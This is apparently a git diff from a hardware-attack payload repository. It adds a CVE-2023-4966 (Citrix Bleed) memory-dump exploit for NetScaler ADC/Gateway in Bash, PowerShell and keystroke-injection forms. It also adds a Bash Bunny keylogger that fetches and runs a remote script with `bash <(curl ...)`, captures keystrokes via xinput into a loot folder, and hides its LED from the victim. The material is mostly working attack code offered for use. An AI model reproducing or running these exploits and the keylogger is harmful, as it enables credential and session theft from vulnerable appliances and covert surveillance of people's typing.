After assigning execute permissions, the above command allows the user to run the script without having to specify the sh command before the script's name.
|
||||||
|
|
||||||
|
## Sources
|
||||||
|
|
||||||
|
1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
|
||||||
|
2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center">Aleff</h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,48 @@
|
||||||
|
#################################################################################
|
||||||
|
# #
|
||||||
|
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : incident-response #
|
||||||
|
# Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||||
|
# #
|
||||||
|
#################################################################################
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
QUACK REM VARIABLES
|
||||||
|
# 1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
|
||||||
|
HOSTNAME='192.168.1.200'
|
||||||
|
|
||||||
|
QUACK DELAY 3000
|
||||||
|
QUACK CTRL-ALT t
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK STRING header_value=\$(yes a | head -n 24576 | tr -d '\n')
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING headers=\"-H 'Host:\$header_value'\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING response=\$(curl -s -k -H \"\$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10)
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING if [ \$? -eq 0 ] && [ \"\$(echo \$response | cut -c 1-3)\" == \"200\" ]; then
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"--- Dumped memory ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"\$response\" | cut -c 131051-
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"--- End ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING else
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"Could not dump memory\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING fi
|
||||||
|
QUACK ENTER
|
|
@ -0,0 +1,17 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
HOSTNAME="$1" # first parameter
|
||||||
|
|
||||||
|
header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||||
|
|
||||||
|
headers="-H 'Host:$header_value'"
|
||||||
|
|
||||||
|
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||||
|
|
||||||
|
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||||
|
echo "--- Dumped memory ---"
|
||||||
|
echo "$response" | cut -c 131051-
|
||||||
|
echo "--- End ---"
|
||||||
|
else
|
||||||
|
echo "Could not dump memory"
|
||||||
|
fi
|
|
@ -0,0 +1,57 @@
|
||||||
|
##################################################################################
|
||||||
|
# #
|
||||||
|
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : incident-response #
|
||||||
|
# Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||||
|
# #
|
||||||
|
##################################################################################
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
QUACK REM VARIABLES
|
||||||
|
#1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
|
||||||
|
HOSTNAME='192.168.1.200'
|
||||||
|
|
||||||
|
QUACK DELAY 1500
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING powershell
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK STRING \$header_value = 'a' * 24576
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$header_value = \$header_value -replace \"\n\", \"\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$headers=\"-H 'Host:\$header_value'\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$headers = @{'Host' = \$header_value}
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$response = Invoke-RestMethod -Uri \$uri -Headers \$headers -Method GET -TimeoutSec 10
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING if (\$response.Substring(0, 3) -eq \"200\") {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Write-Host \"--- Dumped memory ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$response.Substring(131050) # 131051 - 1
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Write-Host \"--- End ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING } else {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Write-Host \"Could not dump memory\"}
|
||||||
|
QUACK ENTER
|
|
@ -0,0 +1,20 @@
|
||||||
|
#/bin/bash
|
||||||
|
checkonbunny() {
|
||||||
|
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
|
||||||
|
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
|
||||||
|
if [ -d $mybunny ]; then
|
||||||
|
bashbunnyloot=$mybunny"/loot"
|
||||||
|
mapfile=$bashbunnyloot"/maps"
|
||||||
|
keyfile=$bashbunnyloot"/keys"
|
||||||
|
startwork
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
startwork(){
|
||||||
|
getdevicetouse=${getdevicetouse#"id="}
|
||||||
|
xinput --test $getdevicetouse > $keyfile &
|
||||||
|
xmodmap -pke > $mapfile
|
||||||
|
}
|
||||||
|
BunnyID="ch000001"
|
||||||
|
bashbunnyloot=''
|
||||||
|
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
|
||||||
|
[[ -z $getdevicetouse ]] || checkonbunny
|
|
@ -0,0 +1,28 @@
|
||||||
|
# Keylogger For Bash Bunny
|
||||||
|
|
||||||
|
Author: TheDragonkeeper
|
||||||
|
|
||||||
|
Version: Version 1
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
|
||||||
|
|
||||||
|
Captures all keyboard input without the need for root access
|
||||||
|
Uses the user keyboard map file for decoding the captured data
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ---------------- | ----------------------------------------------------------------------------- |
|
||||||
|
| Blue flash | Booting |
|
||||||
|
| Red slow | Waiting on webserver |
|
||||||
|
| Blue Fast | Identifying Target and deploying accordingly |
|
||||||
|
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
|
||||||
|
| LED Red Fast | Decoding keys, Then doing any cleanup required |
|
||||||
|
| Green flashing | Task complete, ready to unplug |
|
||||||
|
|
||||||
|
Still WIP, Currently supports linux (tested on ubuntu)
|
||||||
|
If you want to add payloads for OSX or Windows place them into the switch folder then,
|
||||||
|
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt
|
||||||
|
|
|
@ -0,0 +1,43 @@
|
||||||
|
TARGET_OS='LINUX'
|
||||||
|
|
||||||
|
LED B 100
|
||||||
|
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||||
|
sleep 3
|
||||||
|
LED R SLOW
|
||||||
|
GET HOST_IP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
udisk mount
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
python webserver.py &
|
||||||
|
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
|
||||||
|
LED B FAST
|
||||||
|
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
|
||||||
|
LED
|
||||||
|
WAIT
|
||||||
|
LED R 0
|
||||||
|
cd /root/udisk/loot
|
||||||
|
keystate=''
|
||||||
|
_ctrl='0'
|
||||||
|
_alt='0'
|
||||||
|
_shift='0'
|
||||||
|
for line in $(cat 'keys')
|
||||||
|
do
|
||||||
|
if [ $line != 'key' ]; then
|
||||||
|
if [ $line == 'press' ] || [ $line == 'release' ]; then
|
||||||
|
keystate=$line
|
||||||
|
else
|
||||||
|
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
|
||||||
|
searchparams='keycode'"$_spaces"$line
|
||||||
|
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
|
||||||
|
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
|
||||||
|
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
|
||||||
|
LED G 0
|
|
@ -0,0 +1,28 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||||
|
from os import curdir, sep
|
||||||
|
PORT_NUMBER = 8080
|
||||||
|
class myHandler(BaseHTTPRequestHandler):
|
||||||
|
def do_GET(self):
|
||||||
|
if self.path=="/":
|
||||||
|
self.path="/"
|
||||||
|
try:
|
||||||
|
sendReply = False
|
||||||
|
if self.path.endswith(".sh"):
|
||||||
|
mimetype='text/plain'
|
||||||
|
sendReply = True
|
||||||
|
if sendReply == True:
|
||||||
|
f = open(curdir + sep + self.path)
|
||||||
|
self.send_response(200)
|
||||||
|
self.send_header('Content-type',mimetype)
|
||||||
|
self.end_headers()
|
||||||
|
self.wfile.write(f.read())
|
||||||
|
f.close()
|
||||||
|
return
|
||||||
|
except IOError:
|
||||||
|
self.send_error(404,'File Not Found: %s' % self.path)
|
||||||
|
try:
|
||||||
|
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
|
||||||
|
server.serve_forever()
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
server.socket.close()
|
Loading…
Reference in New Issue